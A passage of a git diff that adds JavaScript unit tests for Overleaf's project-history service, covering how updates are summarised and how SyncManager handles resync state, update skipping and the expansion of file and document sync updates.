makeSummary({ + startTs: LATER + 10, + endTs: LATER + 30, + fromV: 8, + toV: 11, + }), + makeSummary({ startTs: 0, endTs: 30, fromV: 1, toV: 8 }), + ]) + }) + + describe('history resync updates', function () { + setupChunks([ + [ + makeUpdate({ + startTs: 0, + v: 1, + origin: { kind: 'history-resync' }, + projectOps: [{ add: { pathname: 'file1.tex' } }], + pathnames: [], + }), + makeUpdate({ + startTs: 20, + v: 2, + origin: { kind: 'history-resync' }, + projectOps: [ + { add: { pathname: 'file2.tex' } }, + { add: { pathname: 'file3.tex' } }, + ], + pathnames: [], + }), + makeUpdate({ + startTs: 40, + v: 3, + origin: { kind: 'history-resync' }, + projectOps: [{ add: { pathname: 'file4.tex' } }], + pathnames: [], + }), + makeUpdate({ + startTs: 60, + v: 4, + origin: { kind: 'history-resync' }, + projectOps: [], + pathnames: ['file1.tex', 'file2.tex', 'file5.tex'], + }), + makeUpdate({ + startTs: 80, + v: 5, + origin: { kind: 'history-resync' }, + projectOps: [], + pathnames: ['file4.tex'], + }), + makeUpdate({ startTs: 100, v: 6, pathnames: ['file1.tex'] }), + ], + ]) + expectSummaries('should merge creates and edits', {}, [ + makeSummary({ + startTs: 100, + endTs: 110, + fromV: 6, + toV: 7, + pathnames: ['file1.tex'], + }), + makeSummary({ + startTs: 0, + endTs: 90, + fromV: 1, + toV: 6, + origin: { kind: 'history-resync' }, + pathnames: ['file5.tex'], + projectOps: [ + { add: { pathname: 'file4.tex' }, atV: 3 }, + { add: { pathname: 'file2.tex' }, atV: 2 }, + { add: { pathname: 'file3.tex' }, atV: 2 }, + { add: { pathname: 'file1.tex' }, atV: 1 }, + ], + }), + ]) + }) + }) + }) +}) + +/** + * Set up mocks as if the project had a number of chunks. + * + * Each parameter represents a chunk and the value of the parameter is the list + * of updates in that chunk. + */ +function setupChunks(updatesByChunk) { + beforeEach('set up chunks', function () { + let startVersion = 0 + for (let i = 0; i < updatesByChunk.length; i++) { + const updates = updatesByChunk[i] + const chunk = { chunk: { startVersion } } + + // Find the chunk by any update version + for (const update of updates) { + this.HistoryStoreManager.getChunkAtVersion + .withArgs(this.projectId, this.historyId, update.v) + .yields(null, chunk) + startVersion = update.v + } + + if (i === updatesByChunk.length - 1) { + this.HistoryStoreManager.getMostRecentChunk + .withArgs(this.projectId, this.historyId) + .yields(null, chunk) + } + + this.ChunkTranslator.convertToSummarizedUpdates + .withArgs(chunk) + .yields(null, updates) + } + }) +} + +function setupLabels(labels) { + beforeEach('set up labels', function () { + this.LabelsManager.getLabels.withArgs(this.projectId).yields(null, labels) + }) +} + +function expectSummaries(description, options, expectedSummaries) { + it(`${description}`, function (done) { + this.SummarizedUpdatesManager.getSummarizedProjectUpdates( + this.projectId, + options, + (err, summaries) => { + if (err) { + return done(err) + } + + // The order of the users array is not significant + for (const summary of summaries) { + summary.meta.users.sort() + } + for (const summary of expectedSummaries) { + summary.meta.users.sort() + } + + expect(summaries).to.deep.equal(expectedSummaries) + done() + } + ) + }) +} + +function makeUpdate(options = {}) { + const { + pathnames = ['main.tex'], + users = ['user1'], + projectOps = [], + startTs = 0, + endTs = startTs + 10, + v = 1, + origin, + } = options + const update = { + pathnames, + project_ops: projectOps, + meta: { users, start_ts: startTs, end_ts: endTs }, + v, + } + if (origin) { + update.meta.origin = origin + } + return update +} + +function makeSummary(options = {}) { + const { + pathnames = ['main.tex'], + users = ['user1'], + startTs = 0, + endTs = startTs + 10, + fromV = 1, + toV = fromV + 1, + labels = [], + projectOps = [], + origin, + } = options + const summary = { + pathnames: new Set(pathnames), + meta: { + users, + start_ts: startTs, + end_ts: endTs, + }, + fromV, + toV, + labels, + project_ops: projectOps, + } + if (origin) { + summary.meta.origin = origin + } + return summary +} diff --git a/services/project-history/test/unit/js/SyncManager/SyncManagerTests.js b/services/project-history/test/unit/js/SyncManager/SyncManagerTests.js new file mode 100644 index 0000000..1004ffd --- /dev/null +++ b/services/project-history/test/unit/js/SyncManager/SyncManagerTests.js @@ -0,0 +1,2008 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import tk from 'timekeeper' +import { File, Comment, TrackedChange, Range } from 'overleaf-editor-core' +import { strict as esmock } from 'esmock' +const { ObjectId } = mongodb + +const MODULE_PATH = '../../../../app/js/SyncManager.js' +const TIMESTAMP = new Date().toISOString() +const USER_ID = 'user-id' + +function resyncProjectStructureUpdate(docs, files) { + return { + resyncProjectStructure: { docs, files }, + + meta: { + ts: TIMESTAMP, + }, + } +} + +function docContentSyncUpdate( + doc, + content, + ranges = {}, + resolvedCommentIds = [] +) { + return { + path: doc.path, + doc: doc.doc, + + resyncDocContent: { + content, + ranges, + resolvedCommentIds, + }, + + meta: { + ts: TIMESTAMP, + }, + } +} + +function makeComment(commentId, pos, text) { + return { + id: commentId, + op: { p: pos, c: text, t: commentId }, + metadata: { + user_id: USER_ID, + ts: TIMESTAMP, + }, + } +} + +function makeTrackedChange(id, op) { + return { + id, + op, + metadata: { user_id: USER_ID, ts: TIMESTAMP }, + } +} + +describe('SyncManager', function () { + beforeEach(async function () { + this.now = new Date() + tk.freeze(this.now) + this.projectId = new ObjectId().toString() + this.historyId = 'mock-overleaf-id' + this.syncState = { origin: { kind: 'history-resync' } } + this.db = { + projectHistorySyncState: { + findOne: sinon.stub().resolves(this.syncState), + updateOne: sinon.stub().resolves(), + }, + } + this.extendLock = sinon.stub().resolves() + + this.LockManager = { + promises: { + runWithLock: sinon.stub().callsFake(async (key, runner) => { + await runner(this.extendLock) + }), + }, + } + + this.UpdateCompressor = { + diffAsShareJsOps: sinon.stub().returns([]), + } + + this.UpdateTranslator = { + isTextUpdate: sinon.stub(), + _convertPathname: sinon.stub(), + } + + this.WebApiManager = { + promises: { + getHistoryId: sinon.stub(), + requestResync: sinon.stub().resolves(), + }, + } + this.WebApiManager.promises.getHistoryId + .withArgs(this.projectId) + .resolves(this.historyId) + + this.ErrorRecorder = { + promises: { + record: sinon.stub().resolves(), + recordSyncStart: sinon.stub().resolves(), + }, + } + + this.RedisManager = {} + + this.SnapshotManager = { + promises: { + getLatestSnapshotFilesForChunk: sinon.stub(), + }, + } + + this.HistoryStoreManager = { + getBlobStore: sinon.stub(), + _getBlobHashFromString: sinon.stub().returns('random-hash'), + } + + this.HashManager = { + _getBlobHashFromString: sinon.stub(), + } + + this.Metrics = { inc: sinon.stub() } + + this.Settings = { + redis: { + lock: { + key_schema: { + projectHistoryLock({ project_id: projectId }) { + return `ProjectHistoryLock:${projectId}` + }, + }, + }, + }, + } + + this.SyncManager = await esmock(MODULE_PATH, { + '../../../../app/js/LockManager.js': this.LockManager, + '../../../../app/js/UpdateCompressor.js': this.UpdateCompressor, + '../../../../app/js/UpdateTranslator.js': this.UpdateTranslator, + '../../../../app/js/mongodb.js': { ObjectId, db: this.db }, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/ErrorRecorder.js': this.ErrorRecorder, + '../../../../app/js/RedisManager.js': this.RedisManager, + '../../../../app/js/SnapshotManager.js': this.SnapshotManager, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/HashManager.js': this.HashManager, + '@overleaf/metrics': this.Metrics, + '@overleaf/settings': this.Settings, + }) + }) + + afterEach(function () { + tk.reset() + }) + + describe('startResync', function () { + describe('if a sync is not in progress', function () { + beforeEach(async function () { + this.db.projectHistorySyncState.findOne.resolves({}) + await this.SyncManager.promises.startResync(this.projectId) + }) + + it('takes the project lock', function () { + expect(this.LockManager.promises.runWithLock).to.have.been.calledWith( + `ProjectHistoryLock:${this.projectId}` + ) + }) + + it('gets the sync state from mongo', function () { + expect(this.db.projectHistorySyncState.findOne).to.have.been.calledWith( + { project_id: new ObjectId(this.projectId) } + ) + }) + + it('requests a resync from web', function () { + expect( + this.WebApiManager.promises.requestResync + ).to.have.been.calledWith(this.projectId) + }) + + it('sets the sync state in mongo and prevents it expiring', function () { + expect( + this.db.projectHistorySyncState.updateOne + ).to.have.been.calledWith( + { + project_id: new ObjectId(this.projectId), + }, + sinon.match({ + $set: { + resyncProjectStructure: true, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + }, + $currentDate: { lastUpdated: true }, + $inc: { resyncCount: 1 }, + $unset: { expiresAt: true }, + }), + { + upsert: true, + } + ) + }) + }) + + describe('if project structure sync is in progress', function () { + beforeEach(function () { + const syncState = { resyncProjectStructure: true } + this.db.projectHistorySyncState.findOne.resolves(syncState) + }) + + it('returns an error if already syncing', async function () { + await expect( + this.SyncManager.promises.startResync(this.projectId) + ).to.be.rejectedWith('sync ongoing') + }) + }) + + describe('if doc content sync in is progress', function () { + beforeEach(async function () { + const syncState = { resyncDocContents: ['/foo.tex'] } + this.db.projectHistorySyncState.findOne.resolves(syncState) + }) + + it('returns an error if already syncing', async function () { + await expect( + this.SyncManager.promises.startResync(this.projectId) + ).to.be.rejectedWith('sync ongoing') + }) + }) + }) + + describe('setResyncState', function () { + describe('when the sync is starting', function () { + beforeEach(function () { + this.syncState = { + toRaw() { + return { + resyncProjectStructure: true, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + } + }, + isSyncOngoing: sinon.stub().returns(true), + } + }) + + it('sets the sync state in mongo and prevents it expiring', async function () { + // SyncState is a private class of SyncManager + // we know the interface however: + await this.SyncManager.promises.setResyncState( + this.projectId, + this.syncState + ) + + expect( + this.db.projectHistorySyncState.updateOne + ).to.have.been.calledWith( + { project_id: new ObjectId(this.projectId) }, + sinon.match({ + $set: this.syncState.toRaw(), + $currentDate: { lastUpdated: true }, + $inc: { resyncCount: 1 }, + $unset: { expiresAt: true }, + }), + { upsert: true } + ) + }) + }) + + describe('when the sync is ending', function () { + beforeEach(function () { + this.syncState = { + toRaw() { + return { + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + } + }, + isSyncOngoing: sinon.stub().returns(false), + } + }) + + it('sets the sync state entry in mongo to expire', async function () { + await this.SyncManager.promises.setResyncState( + this.projectId, + this.syncState + ) + + expect( + this.db.projectHistorySyncState.updateOne + ).to.have.been.calledWith( + { project_id: new ObjectId(this.projectId) }, + sinon.match({ + $set: { + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + expiresAt: new Date(this.now.getTime() + 90 * 24 * 3600 * 1000), + }, + $currentDate: { lastUpdated: true }, + }), + { upsert: true } + ) + }) + }) + + describe('when the new sync state is null', function () { + it('does not update the sync state in mongo', async function () { + // SyncState is a private class of SyncManager + // we know the interface however: + await this.SyncManager.promises.setResyncState(this.projectId, null) + expect(this.db.projectHistorySyncState.updateOne).to.not.have.been + .called + }) + }) + }) + + describe('skipUpdatesDuringSync', function () { + describe('if a sync is not in progress', function () { + beforeEach(async function () { + this.db.projectHistorySyncState.findOne.resolves({}) + this.updates = ['some', 'mock', 'updates'] + this.result = await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + this.updates + ) + }) + + it('returns all updates', function () { + expect(this.result.updates).to.deep.equal(this.updates) + }) + + it('should not return any newSyncState', function () { + expect(this.result.syncState).to.be.null + }) + }) + + describe('if a sync in is progress', function () { + beforeEach(function () { + this.renameUpdate = { + pathname: 'old.tex', + newPathname: 'new.tex', + } + this.projectStructureSyncUpdate = { + resyncProjectStructure: { + docs: [{ path: 'new.tex' }], + files: [], + }, + } + this.textUpdate = { + doc: new ObjectId(), + op: [{ i: 'a', p: 4 }], + meta: { + pathname: 'new.tex', + doc_length: 4, + }, + } + this.docContentSyncUpdate = { + path: 'new.tex', + resyncDocContent: { + content: 'a', + }, + } + this.UpdateTranslator.isTextUpdate + .withArgs(this.renameUpdate) + .returns(false) + this.UpdateTranslator.isTextUpdate + .withArgs(this.projectStructureSyncUpdate) + .returns(false) + this.UpdateTranslator.isTextUpdate + .withArgs(this.docContentSyncUpdate) + .returns(false) + this.UpdateTranslator.isTextUpdate + .withArgs(this.textUpdate) + .returns(true) + + const syncState = { + resyncProjectStructure: true, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + } + this.db.projectHistorySyncState.findOne.resolves(syncState) + }) + + it('remove updates before a project structure sync update', async function () { + const updates = [ + this.renameUpdate, + this.textUpdate, + this.projectStructureSyncUpdate, + ] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([this.projectStructureSyncUpdate]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: ['new.tex'], + origin: { kind: 'history-resync' }, + }) + }) + + it('records docs to resync when resyncProjectStructureOnly=true is not set', async function () { + const updates = [this.projectStructureSyncUpdate] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([this.projectStructureSyncUpdate]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: ['new.tex'], + origin: { kind: 'history-resync' }, + }) + }) + + it('records no docs to resync with resyncProjectStructureOnly=true', async function () { + this.projectStructureSyncUpdate.resyncProjectStructureOnly = true + const updates = [this.projectStructureSyncUpdate] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([this.projectStructureSyncUpdate]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + }) + }) + + it('allow project structure updates after project structure sync update', async function () { + const updates = [this.projectStructureSyncUpdate, this.renameUpdate] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([ + this.projectStructureSyncUpdate, + this.renameUpdate, + ]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: ['new.tex'], + origin: { kind: 'history-resync' }, + }) + }) + + it('remove text updates for a doc before doc sync update', async function () { + const updates = [ + this.projectStructureSyncUpdate, + this.textUpdate, + this.docContentSyncUpdate, + ] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([ + this.projectStructureSyncUpdate, + this.docContentSyncUpdate, + ]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + }) + }) + + it('allow text updates for a doc after doc sync update', async function () { + const updates = [ + this.projectStructureSyncUpdate, + this.docContentSyncUpdate, + this.textUpdate, + ] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([ + this.projectStructureSyncUpdate, + this.docContentSyncUpdate, + this.textUpdate, + ]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + }) + }) + }) + }) + + describe('expandSyncUpdates', function () { + beforeEach(function () { + this.persistedDoc = { + doc: 'doc-id', + path: 'main.tex', + } + this.persistedDocContent = 'the quick brown fox jumps over the lazy dog' + this.persistedFile = { + file: 'file-id', + path: '1.png', + _hash: 'abcde', + } + this.loadedSnapshotDoc = File.fromString(this.persistedDocContent) + this.mostRecentChunk = 'fake chunk' + this.fileMap = { + 'main.tex': { + isEditable: sinon.stub().returns(true), + getContent: sinon.stub().returns(null), + getHash: sinon.stub().returns(null), + load: sinon.stub().resolves(this.loadedSnapshotDoc), + getMetadata: sinon.stub().returns({}), + }, + '1.png': { + isEditable: sinon.stub().returns(false), + data: { hash: this.persistedFile._hash }, + getMetadata: sinon.stub().returns({}), + }, + } + this.UpdateTranslator._convertPathname + .withArgs('main.tex') + .returns('main.tex') + this.UpdateTranslator._convertPathname + .withArgs('/main.tex') + .returns('main.tex') + this.UpdateTranslator._convertPathname + .withArgs('another.tex') + .returns('another.tex') + this.UpdateTranslator._convertPathname.withArgs('1.png').returns('1.png') + this.UpdateTranslator._convertPathname.withArgs('2.png').returns('2.png') + this.SnapshotManager.promises.getLatestSnapshotFilesForChunk.resolves( + this.fileMap + ) + }) + + it('returns updates if no sync updates are queued', async function () { + const updates = ['some', 'mock', 'updates'] + const expandedUpdates = await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.equal(updates) + expect(this.SnapshotManager.promises.getLatestSnapshotFilesForChunk).to + .not.have.been.called + expect(this.extendLock).to.not.have.been.called + }) + + describe('expanding project structure sync updates', function () { + it('queues nothing for expected docs and files', async function () { + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([]) + expect(this.extendLock).to.have.been.called + }) + + it('queues file removes for unexpected files', async function () { + const updates = [resyncProjectStructureUpdate([this.persistedDoc], [])] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: this.persistedFile.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues doc removes for unexpected docs', async function () { + const updates = [resyncProjectStructureUpdate([], [this.persistedFile])] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: this.persistedDoc.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues file additions for missing regular files', async function () { + const newFile = { + path: '2.png', + file: {}, + url: 'filestore/2.png', + _hash: 'hash-42', + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile, newFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: newFile.path, + file: newFile.file, + url: newFile.url, + hash: 'hash-42', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues file additions for missing regular files w/o url', async function () { + const newFile = { + path: '2.png', + file: {}, + _hash: 'hash-42', + createdBlob: true, + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile, newFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: newFile.path, + file: newFile.file, + hash: 'hash-42', + createdBlob: true, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues file additions for missing linked files', async function () { + const newFile = { + path: '2.png', + file: {}, + url: 'filestore/2.png', + metadata: { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'references-provider', + }, + _hash: 'hash-42', + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile, newFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: newFile.path, + file: newFile.file, + url: newFile.url, + hash: 'hash-42', + metadata: { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'references-provider', + }, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues blank doc additions for missing docs', async function () { + const newDoc = { + path: 'another.tex', + doc: new ObjectId().toString(), + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc, newDoc], + [this.persistedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: newDoc.path, + doc: newDoc.doc, + docLines: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('removes and re-adds files if whether they are binary differs', async function () { + const fileWichWasADoc = { + path: this.persistedDoc.path, + url: 'filestore/2.png', + _hash: 'other-hash', + } + + const updates = [ + resyncProjectStructureUpdate( + [], + [fileWichWasADoc, this.persistedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: fileWichWasADoc.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + pathname: fileWichWasADoc.path, + file: fileWichWasADoc.file, + url: fileWichWasADoc.url, + hash: 'other-hash', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('removes and re-adds linked-files if their binary state differs', async function () { + const fileWhichWasADoc = { + path: this.persistedDoc.path, + url: 'filestore/references.txt', + _hash: 'other-hash', + metadata: { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'references-provider', + }, + } + + const updates = [ + resyncProjectStructureUpdate( + [], + [fileWhichWasADoc, this.persistedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: fileWhichWasADoc.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + pathname: fileWhichWasADoc.path, + file: fileWhichWasADoc.file, + url: fileWhichWasADoc.url, + hash: 'other-hash', + metadata: { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'references-provider', + }, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('add linked file data with same hash', async function () { + const nowLinkedFile = { + path: this.persistedFile.path, + url: 'filestore/1.png', + _hash: this.persistedFile._hash, + metadata: { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'image-provider', + }, + } + + const updates = [ + resyncProjectStructureUpdate([this.persistedDoc], [nowLinkedFile]), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: nowLinkedFile.path, + metadata: { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'image-provider', + }, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('updates linked file data when hash remains the same', async function () { + this.fileMap[this.persistedFile.path].getMetadata.returns({ + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'image-provider', + }) + const updatedLinkedFile = { + path: this.persistedFile.path, + url: 'filestore/1.png', + _hash: this.persistedFile._hash, + metadata: { + importedAt: '2024-07-31T00:00:00.000Z', + provider: 'image-provider', + }, + } + + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [updatedLinkedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: updatedLinkedFile.path, + metadata: { + importedAt: '2024-07-31T00:00:00.000Z', + provider: 'image-provider', + }, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('remove linked file data', async function () { + this.fileMap[this.persistedFile.path].getMetadata.returns({ + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'image-provider', + }) + + const noLongerLinkedFile = { + path: this.persistedFile.path, + url: 'filestore/1.png', + _hash: this.persistedFile._hash, + } + + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [noLongerLinkedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: noLongerLinkedFile.path, + metadata: {}, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it("does not remove and re-add files if the expected file doesn't have a hash", async function () { + const fileWichWasADoc = { + path: this.persistedDoc.path, + url: 'filestore/2.png', + } + + const updates = [ + resyncProjectStructureUpdate( + [], + [fileWichWasADoc, this.persistedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([]) + expect(this.extendLock).to.have.been.called + }) + + it('does not remove and re-add editable files if there is a binary file with same hash', async function () { + const binaryFile = { + file: Object().toString(), + // The paths in the resyncProjectStructureUpdate must have a leading slash ('/') + // The other unit tests in this file are incorrectly missing the leading slash. + // The leading slash is present in web where the paths are created with + // ProjectEntityHandler.getAllEntitiesFromProject in ProjectEntityUpdateHandler.resyncProjectHistory. + path: '/' + this.persistedDoc.path, + url: 'filestore/12345', + _hash: 'abcdef', + } + this.fileMap['main.tex'].data = { hash: 'abcdef' } + + const updates = [ + resyncProjectStructureUpdate([], [binaryFile, this.persistedFile]), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([]) + expect(this.extendLock).to.have.been.called + }) + + it('removes and re-adds binary files if they do not have same hash', async function () { + const persistedFileWithNewContent = { + _hash: 'anotherhashvalue', + hello: 'world', + path: '1.png', + url: 'filestore-new-url', + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [persistedFileWithNewContent] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: persistedFileWithNewContent.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + pathname: persistedFileWithNewContent.path, + file: persistedFileWithNewContent.file, + url: persistedFileWithNewContent.url, + hash: 'anotherhashvalue', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('removes and re-adds binary files w/o url if they do not have same hash', async function () { + const persistedFileWithNewContent = { + _hash: 'anotherhashvalue', + hello: 'world', + path: '1.png', + createdBlob: true, + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [persistedFileWithNewContent] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: persistedFileWithNewContent.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + pathname: persistedFileWithNewContent.path, + file: persistedFileWithNewContent.file, + hash: 'anotherhashvalue', + createdBlob: true, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('preserves other updates', async function () { + const update = { mock: 'update' } + const updates = [ + update, + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([update]) + expect(this.extendLock).to.have.been.called + }) + }) + + describe('expanding doc contents sync updates', function () { + it('returns errors from diffAsShareJsOps', async function () { + const diffError = new Error('test') + this.UpdateCompressor.diffAsShareJsOps.throws(diffError) + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent), + ] + await expect( + this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + ).to.be.rejectedWith(diffError) + expect(this.extendLock).to.have.been.called + }) + + it('handles an update for a file that is missing from the snapshot', async function () { + const updates = [docContentSyncUpdate('not-in-snapshot.txt', 'test')] + await expect( + this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + ).to.be.rejectedWith('unrecognised file: not in snapshot') + }) + + it('queues nothing for in docs whose contents is in sync', async function () { + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent), + ] + this.UpdateCompressor.diffAsShareJsOps.returns([]) 